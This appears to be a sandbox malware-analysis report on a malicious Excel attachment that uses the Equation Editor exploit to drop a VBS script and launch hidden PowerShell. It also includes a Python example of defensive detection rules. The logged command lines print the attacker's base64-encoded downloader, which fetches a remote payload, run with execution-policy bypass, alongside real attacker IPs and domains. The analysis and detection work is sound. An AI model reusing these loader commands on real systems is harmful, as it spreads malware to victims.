})[-1..-(Jf5'+'bas'+'e64Command.Length)];Jf5commandBytes = [System.Convert]::FromBase64String(Jf5base64Reversed);Jf5loadedAssembly = [System.Reflection.Assembly'+']::Load(Jf5co
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdKZjVpbWFnZVVybCA9IDdaYWh0dHBzOi8vMzEwNS5maWwnKydlbWFpbC5jb20vYScrJ3BpL2ZpbGUvZ2V0P2ZpbGVrZXk9c2hUUEhiQ1BYOG8tbE8nKyd0Q3FITEc2XzB4Q3kteGw0dG54bEFWYlE5JysnNS1kdmlUSzVjQVJhTmRRamJiM21leGZ3UXpLbVRYZyZza2lwcmVnPXRydWUmcGtfdmlkPWUwMTA5NjM4YzliZmI5NTcxNzMyNTMxMzA5YjVmZjdjIDdaYTtKZjV3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQnKycuV2ViQ2xpZW50OycrJ0pmNWltYScrJ2dlQnl0ZXMgPSBKZjV3ZWJDbGllbnQuRG93bmxvYWREYXRhKEpmNWltYWdlVXJsKTtKZjVpbWFnZVRleHQgPSBb
    Source: Process startedAuthor: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdKZjVpbWFnZVVybCA9IDdaYWh0dHBzOi8vMzEwNS5maWwnKydlbWFpbC5jb20vYScrJ3BpL2ZpbGUvZ2V0P2ZpbGVrZXk9c2hUUEhiQ1BYOG8tbE8nKyd0Q3FITEc2XzB4Q3kteGw0dG54bEFWYlE5JysnNS1kdmlUSzVjQVJhTmRRamJiM21leGZ3UXpLbVRYZyZza2lwcmVnPXRydWUmcGtfdmlkPWUwMTA5NjM4YzliZmI5NTcxNzMyNTMxMzA5YjVmZjdjIDdaYTtKZjV3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQnKycuV2ViQ2xpZW50OycrJ0pmNWltYScrJ2dlQnl0ZXMgPSBKZjV3ZWJDbGllbnQuRG93bmxvYWREYXRhKEpmNWltYWdlVXJsKTtKZjVpbWFnZVRleHQgPSBb
    Source: Process started; Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemegivenmebesttokissyourlipswithentirethingsf9rm.vBs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemegivenmebesttokissyourlipswithentirethingsf9rm.vBs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3208, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemegivenmebesttokissyourlipswithentirethingsf9rm.vBs" , ProcessId: 3880, ProcessName: wscript.exe
    Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemegivenmebesttokissyourlipswithentirethingsf9rm.vBs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemegivenmebesttokissyourlipswithentirethingsf9rm.vBs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3208, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemegivenmebesttokissyourlipswithentirethingsf9rm.vBs" , ProcessId: 3880, ProcessName: wscript.exe
    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdKZjVpbWFnZVVybCA9IDdaYWh0dHBzOi8vMzEwNS5maWwnKydlbWFpbC5jb20vYScrJ3BpL2ZpbGUvZ2V0P2ZpbGVrZXk9c2hUUEhiQ1BYOG8tbE8nKyd0Q3FITEc2XzB4Q3kteGw0dG54bEFWYlE5JysnNS1kdmlUSzVjQVJhTmRRamJiM21leGZ3UXpLbVRYZyZza2lwcmVnPXRydWUmcGtfdmlkPWUwMTA5NjM4YzliZmI5NTcxNzMyNTMxMzA5YjVmZjdjIDdaYTtKZjV3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQnKycuV2ViQ2xpZW50OycrJ0pmNWltYScrJ2dlQnl0ZXMgPSBKZjV3ZWJDbGllbnQuRG93bmxvYWREYXRhKEpmNWltYWdlVXJsKTtKZjVpbWFnZVRleHQgPSBb
    Source: Network Connection; Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0', Tim Shelton; Data: DestinationIp: 152.231.102.107, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3208, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
    Source: Network Connection; Author: X__Junior (Nextron Systems); Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49165, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3208, Protocol: tcp, SourceIp: 152.231.102.107, SourceIsIpv6: false, SourcePort: 443
    Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemegivenmebesttokissyourlipswithentirethingsf9rm.vBs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemegivenmebesttokissyourlipswithentirethingsf9rm.vBs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3208, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemegivenmebesttokissyourlipswithentirethingsf9rm.vBs" , ProcessId: 3880, ProcessName: wscript.exe
    Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3208, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdKZjVpbWFnZVVybCA9IDdaYWh0dHBzOi8vMzEwNS5maWwnKydlbWFpbC5jb20vYScrJ3BpL2ZpbGUvZ2V0P2ZpbGVrZXk9c2hUUEhiQ1BYOG8tbE8nKyd0Q3FITEc2XzB4Q3kteGw0dG54bEFWYlE5JysnNS1kdmlUSzVjQVJhTmRRamJiM21leGZ3UXpLbVRYZyZza2lwcmVnPXRydWUmcGtfdmlkPWUwMTA5NjM4YzliZmI5NTcxNzMyNTMxMzA5YjVmZjdjIDdaYTtKZjV3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQnKycuV2ViQ2xpZW50OycrJ0pmNWltYScrJ2dlQnl0ZXMgPSBKZjV3ZWJDbGllbnQuRG93bmxvYWREYXRhKEpmNWltYWdlVXJsKTtKZjVpbWFnZVRleHQgPSBb
    Source: File created; Author: Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3472, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
    Source: File created; Author: frack113; Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3924, TargetFilename: C:\Users\user\AppData\Local\Temp\bkkuvkek.fso.ps1
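    Every Sigma match listed above is expressed over the same three Sysmon event types: process creation (EventID 1, with Image, ParentImage and CommandLine), network connection (EventID 3, with Image, Initiated and DestinationIp) and file creation (EventID 11, with Image and TargetFilename). The Python below is an added example, not part of the report or of the Sigma rules it names: it implements six of those checks as plain functions and runs them over a constructed event list that mirrors this sample's chain (Excel, Word, EQNEDT32, wscript, the two PowerShell stages, with command lines shortened) plus three benign events as controls. The rule bodies are the example's own approximation of the named rules' intent, not their exact selection clauses.

```python
import ipaddress
import re

# Constructed Sysmon-style events mirroring the Sigma matches in the report above
# (EventID 1 = process create, 3 = network connect, 11 = file create). Command lines
# are shortened with "..."; PIDs, hashes and timestamps are omitted because the rules
# below do not use them. Events 0, 1 and 10 are benign controls.
OFFICE14 = r"C:\Program Files\Microsoft Office\Office14"
EQNEDT32 = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
PS32 = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
VBS = r"C:\Users\user\AppData\Roaming\seemegivenmebesttokissyourlipswithentirethingsf9rm.vBs"

EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\explorer.exe", "ParentImage": r"C:\Windows\System32\userinit.exe",
     "CommandLine": "explorer.exe"},
    {"EventID": 1, "Image": OFFICE14 + r"\EXCEL.EXE", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": '"' + OFFICE14 + r'\EXCEL.EXE" "C:\Users\user\Desktop\Pedido No 4500924462.xls"'},
    {"EventID": 3, "Image": OFFICE14 + r"\EXCEL.EXE", "Initiated": True,
     "DestinationIp": "152.231.102.107", "DestinationPort": 443},
    {"EventID": 1, "Image": OFFICE14 + r"\WINWORD.EXE", "ParentImage": OFFICE14 + r"\EXCEL.EXE",
     "CommandLine": '"' + OFFICE14 + r'\WINWORD.EXE" -Embedding'},
    {"EventID": 1, "Image": EQNEDT32, "ParentImage": OFFICE14 + r"\WINWORD.EXE",
     "CommandLine": '"' + EQNEDT32 + '" -Embedding'},
    {"EventID": 3, "Image": EQNEDT32, "Initiated": True, "DestinationIp": "23.95.128.215", "DestinationPort": 80},
    {"EventID": 11, "Image": EQNEDT32, "TargetFilename": VBS},
    {"EventID": 1, "Image": r"C:\Windows\SysWOW64\wscript.exe", "ParentImage": OFFICE14 + r"\EXCEL.EXE",
     "CommandLine": r'"C:\Windows\System32\WScript.exe" "' + VBS + '"'},
    {"EventID": 1, "Image": PS32, "ParentImage": r"C:\Windows\SysWOW64\wscript.exe",
     "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '
                    "'KCdKZjVpbWFnZVVybCA9IDdaYWh0dHBzOi8v...';$OWjuxd = [system.Text.encoding]::UTF8.GetString("
                    "[system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden "
                    "-executionpolicy bypass -NoProfile -command $OWjuxD"},
    {"EventID": 1, "Image": PS32, "ParentImage": PS32,
     "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden '
                    "-executionpolicy bypass -NoProfile -command \"('Jf5imageUrl = 7Zahttps://3105.fil'+'email.com/...')"
                    ".REPlAce('Jf5',[StriNG][ChAR]36).REPlAce('7Za',[StriNG][ChAR]39) | .( $pshOmE[21]+$pSHOme[30]+'x')\""},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine": "powershell.exe -NoProfile -Command Get-Process"},
]

OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe", "eqnedt32.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe"}
DROP_EXT = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".hta", ".ps1", ".bat", ".cmd", ".exe", ".dll", ".scr")


def _name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def suspicious_office_child(ev: dict) -> bool:
    # Approximates Sigma "Suspicious Microsoft Office Child Process": Office parent, script host child.
    return ev["EventID"] == 1 and _name(ev["ParentImage"]) in OFFICE and _name(ev["Image"]) in SCRIPT_HOSTS


def equation_editor_started(ev: dict) -> bool:
    # "Office Equation Editor has been started": EQNEDT32.EXE only runs to serve an embedded object.
    return ev["EventID"] == 1 and _name(ev["Image"]) == "eqnedt32.exe"


def equation_editor_network(ev: dict) -> bool:
    # Approximates Sigma "Equation Editor Network Connection": the editor never needs the network.
    return ev["EventID"] == 3 and _name(ev["Image"]) == "eqnedt32.exe" and bool(ev.get("Initiated"))


def equation_editor_file_drop(ev: dict) -> bool:
    # Approximates Sigma "File Dropped By EQNEDT32EXE": an executable or script written by the editor.
    return ev["EventID"] == 11 and _name(ev["Image"]) == "eqnedt32.exe" and ev["TargetFilename"].lower().endswith(DROP_EXT)


def office_outbound_connection(ev: dict) -> bool:
    # Approximates Sigma "Suspicious Office Outbound Connections": Office process to a public address.
    return (ev["EventID"] == 3 and _name(ev["Image"]) in OFFICE and bool(ev.get("Initiated"))
            and ipaddress.ip_address(ev["DestinationIp"]).is_global)


def obfuscated_powershell(ev: dict) -> bool:
    # Folds "Change PowerShell Policies to an Insecure Level", "Base64 Encoded FromBase64String Cmdlet"
    # and "Potential PowerShell Command Line Obfuscation" into one check: two or more indicators fire.
    if ev["EventID"] != 1 or _name(ev["Image"]) != "powershell.exe":
        return False
    cmd = ev["CommandLine"].lower()
    indicators = (
        "-executionpolicy bypass" in cmd or "-ep bypass" in cmd,
        "-windowstyle hidden" in cmd or "-w hidden" in cmd,
        "frombase64string" in cmd,
        bool(re.search(r"\[char\]\s*\d+", cmd)) and ".replace(" in cmd,   # [ChAR]n + .Replace() token swapping
        bool(re.search(r"\$pshome\[\d+\]", cmd)),                         # cmdlet spelled from $PSHOME characters
        len(cmd) > 1000,
    )
    return sum(indicators) >= 2


RULES = {f.__name__: f for f in (suspicious_office_child, equation_editor_started, equation_editor_network,
                                 equation_editor_file_drop, office_outbound_connection, obfuscated_powershell)}


def run_rules(events, rules=RULES):
    """Return (event_index, rule_name) for every rule that fires on every event."""
    return [(i, name) for i, ev in enumerate(events) for name, rule in rules.items() if rule(ev)]


if __name__ == "__main__":
    for i, name in run_rules(EVENTS):
        print(f"event {i:2d} {_name(EVENTS[i]['Image']):<16} {name}")
```

    Run as a script it prints one line per (event, rule) hit; the WINWORD.EXE child of EXCEL.EXE and the interactive Get-Process session deliberately produce none, which is the kind of control a rule should be checked against before it goes into a SIEM. The PowerShell check deliberately demands two indicators, since any single one (a hidden window, an execution-policy override) is common in legitimate administration.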
    Timestamp                       | SID     | Severity | Classtype                     | Source IP    | Source Port | Destination IP | Destination Port | Protocol
    2024-11-27T17:56:25.440158+0100 | 2858795 | 1        | A Network Trojan was detected | 192.168.2.22 | 49174       | 23.95.128.215  | 80               | TCP


    AV Detection

    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B7AFCBA1.doc; Avira: detection malicious, Label: HEUR/Rtf.Malformed
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemybestmagicalthingseniterworldwhcihgivenbesthingsenterietimegiven_____________givembestthingswhichireallyfelltodobestthingswhichireallynedd__________bestof[1].doc; Avira: detection malicious, Label: HEUR/Rtf.Malformed
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{498AB1A3-A070-4AC4-B443-2EA9C1DC4C55}.tmp; Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen
    Source: Pedido No 4500924462.xls; ReversingLabs: Detection: 23%
    Source: Pedido No 4500924462.xls; Joe Sandbox ML: detected

    Exploits

    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Network connect: IP: 23.95.128.215 Port: 80
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Windows\SysWOW64\wscript.exe
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Source: unknown; HTTPS traffic detected: 152.231.102.107:443 -> 192.168.2.22:49168 version: TLS 1.0
    Source: unknown; HTTPS traffic detected: 152.231.102.107:443 -> 192.168.2.22:49169 version: TLS 1.0
    Source: unknown; HTTPS traffic detected: 152.231.102.107:443 -> 192.168.2.22:49170 version: TLS 1.0
    Source: unknown; HTTPS traffic detected: 193.30.119.205:443 -> 192.168.2.22:49175 version: TLS 1.0
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: unknown; HTTPS traffic detected: 152.231.102.107:443 -> 192.168.2.22:49165 version: TLS 1.2
    Source: unknown; HTTPS traffic detected: 152.231.102.107:443 -> 192.168.2.22:49167 version: TLS 1.2
    Source: Binary string: mscorlib.pdb source: powershell.exe, 0000000D.00000002.472460335.0000000005046000.00000004.00000020.00020000.00000000.sdmp

    Software Vulnerabilities

    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 9_2_035705DC URLDownloadToFileW,ShellExecuteW,ExitProcess,9_2_035705DC
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 9_2_0357060A ShellExecuteW,ExitProcess,9_2_0357060A
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 9_2_03570509 LoadLibraryW,9_2_03570509
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 9_2_035705F5 ShellExecuteW,ExitProcess,9_2_035705F5
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 9_2_03570404 ExitProcess,9_2_03570404
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 9_2_0357062F ExitProcess,9_2_0357062F
    Source: C:\Windows\SysWOW64\wscript.exe | Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Source: global traffic | DNS query: name: ljg.cl
    Source: global traffic | DNS query: name: 3105.filemail.com
    Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
    Source: global traffic | TCP traffic: 192.168.2.22:49175 -> 193.30.119.205:443
    Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global traffic | TCP traffic: 192.168.2.22:49174 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49167
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49167
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49167
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49167
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49167
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 152.231.102.107:443
